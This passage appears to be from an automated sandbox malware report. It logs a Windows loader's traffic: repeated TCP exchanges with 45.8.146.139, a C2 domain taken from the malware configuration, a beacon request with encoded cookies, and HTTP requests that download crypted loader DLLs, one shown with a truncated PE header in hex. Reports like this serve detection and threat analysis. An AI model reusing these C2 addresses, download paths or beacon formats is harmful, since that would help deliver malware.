    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49173
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 64.227.108.27:80

    Networking

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 64.227.108.27 80Jump to behavior
    Source: C:\Windows\System32\rundll32.exeDomain query: alexbionka.com
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: alexbionka.com
    Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveCookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03Host: alexbionka.com
    Source: Joe Sandbox ViewIP Address: 64.227.108.27 64.227.108.27
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Aug 2022 15:38:26 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34X-Powered-By: PHP/7.2.34Content-Description: File TransferContent-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"Expires: 0Cache-Control: must-revalidatePragma: publicContent-Length: 360448Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 ef 34 c3 11 8e 5a 90 11 8e 5a 90 11 8e 5a 90 02 e9 59 91 10 8e 5a 90 59 e0 5a 91 10 8e 5a 90 33 e6 a5 90 10 8e 5a 90 6a e1 58 91 10 8e 5a 90 52 69 63 68 11 8e 5a 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 59 d1 f4 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 0e 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 0a 00 06 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 91 9d 05 00 03 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 90 05 00 7d 01 00 00 00 00 00 00 00 00 00 00 00 a0 05 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 77 05 00 00 10 00 00 00 78 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7d 01 00 00 00 90 05 00 00 02 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 a0 05 00 00 02 00 00 00 7e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.8.146.139Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 11 Aug 2022 15:38:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
    Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
